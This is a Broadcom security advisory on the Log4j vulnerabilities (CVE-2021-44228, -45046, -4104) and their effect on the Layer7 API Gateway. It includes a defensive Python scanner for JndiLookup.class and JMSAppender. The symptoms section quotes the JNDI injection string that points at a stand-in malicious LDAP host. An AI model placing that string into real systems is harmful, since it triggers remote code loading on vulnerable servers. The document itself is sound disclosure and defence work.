Layer7 API Gateway - Security Advisory - Log4J CVE-2021-44228, CVE-2021-45046, CVE-2021-4104

Product: CA API Gateway

Advisory ID: 19791

Last updated: 21 December 2021

Published: 10 December 2021

Status: CLOSED

Severity: Critical

CVSS score: 10.0

Dear Broadcom Customer:

The purpose of this Advisory is to inform you of a critical vulnerability recently identified in the log4j library, tracked as CVE-2021-44228, CVE-2021-45046 and CVE-2021-4104. Please read the information provided below and follow the instructions in order to avoid being impacted by this problem.

PRODUCT(S) AFFECTED: Layer7 API Gateway

RELEASE: 9.4, 10.0, 10.1

PROBLEM DESCRIPTION: 

Apache Log4j2 <= 2.14.1: JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints.

SYMPTOMS:

A single string of text can trigger an application to reach out to an external location if it is logged via the vulnerable instance of log4j. A threat actor might supply specially crafted text in an HTTP User-Agent header or a simple POST form request, in the usual form ${jndi:ldap://maliciousexternalhost.com/resource}, where maliciousexternalhost.com is a host controlled by the adversary.

IMPACT:

An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

WORKAROUND:

No workaround is required at this time.

PROBLEM RESOLUTION:

Dec 10, 2021 - Investigation has started.

Dec 14, 2021 - We have not discovered any issues in the Layer7 API Gateway software itself so far, but Symantec SiteMinder (CA Single Sign-On) has been impacted. As the Gateway includes the SSO SDK by default, API Gateway is impacted. Please follow this KB article for mitigation steps.

On a similar note, we would like to remind customers that if they have added any third-party components to Gateway instances that were not shipped by Broadcom, they should check for advisories from the respective vendors.

If you have any questions about this Advisory, please contact Broadcom Support.

Dec 16, 2021 - This is the final update. We have not seen any further impact to Layer7 API Gateway. Please follow the KB article to mitigate the risk identified earlier.

Dec 21, 2021 - This update clarifies the full list of CVEs covered. No further impacts have been seen.

ADDITIONAL INFORMATION:

According to the latest updates from the log4j team, a related vulnerability in log4j 1.x, limited to JMSAppender only, has been published as a separate CVE (CVE-2021-4104).

As API Gateway does not utilize the JMS appender of log4j and does not include "JndiLookup.class", API Gateway is not impacted by this issue. Customers who have added JMSAppender to their log4j configuration(s) should check for it and remove it to avoid this vulnerability. We will plan for a library upgrade in the near future.
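As an added illustration of the two checks this advisory asks customers to perform (example code, not Broadcom's tooling): a small Python audit that walks a Gateway installation directory, flags archives that still bundle JndiLookup.class (the log4j 2.x CVEs) and flags log4j 1.x configurations that wire up JMSAppender (CVE-2021-4104). File names and the directory layout are assumptions, and the sample tree it builds is constructed data.

```python
import os
import re
import tempfile
import zipfile

# Added example, not Broadcom tooling; file and path names below are assumptions.
LOG4J_CONFIG_NAMES = ("log4j.properties", "log4j.xml", "log4j2.xml", "log4j2.properties")
JMS_APPENDER_RE = re.compile(r"org\.apache\.log4j\.net\.JMSAppender")

def jar_has_jndi_lookup(jar_path):
    """True if the archive ships log4j-core's JndiLookup.class (CVE-2021-44228/45046)."""
    try:
        with zipfile.ZipFile(jar_path) as jar:
            return any(n.endswith("/JndiLookup.class") for n in jar.namelist())
    except zipfile.BadZipFile:
        return False  # not a real jar, nothing to inspect

def config_enables_jms_appender(config_path):
    """True if a log4j 1.x configuration wires up JMSAppender (CVE-2021-4104)."""
    with open(config_path, encoding="utf-8", errors="replace") as fh:
        return JMS_APPENDER_RE.search(fh.read()) is not None

def scan(root):
    """Walk root; return sorted (finding, path relative to root) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            if fname.endswith((".jar", ".war", ".ear")) and jar_has_jndi_lookup(path):
                findings.append(("JndiLookup.class present", os.path.relpath(path, root)))
            elif fname in LOG4J_CONFIG_NAMES and config_enables_jms_appender(path):
                findings.append(("JMSAppender configured", os.path.relpath(path, root)))
    return sorted(findings)

def build_fixture(root):
    """Constructed sample tree (not real Gateway files): vulnerable jar, clean jar, JMS config."""
    os.makedirs(os.path.join(root, "lib"), exist_ok=True)
    with zipfile.ZipFile(os.path.join(root, "lib", "thirdparty-log4j-core.jar"), "w") as jar:
        jar.writestr("org/apache/logging/log4j/core/lookup/JndiLookup.class", b"\xca\xfe")
    with zipfile.ZipFile(os.path.join(root, "lib", "gateway-app.jar"), "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    with open(os.path.join(root, "log4j.properties"), "w", encoding="utf-8") as fh:
        fh.write("log4j.appender.jms=org.apache.log4j.net.JMSAppender\n")

def demo():
    """Build the fixture in a temporary directory and return what scan reports."""
    with tempfile.TemporaryDirectory() as tmp:
        build_fixture(tmp)
        return scan(tmp)
```

Call `demo()` to see the two findings against the constructed tree, or point `scan()` at the Gateway installation directory on a real host; a clean host yields an empty list.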

Thank you,

Broadcom Support Team.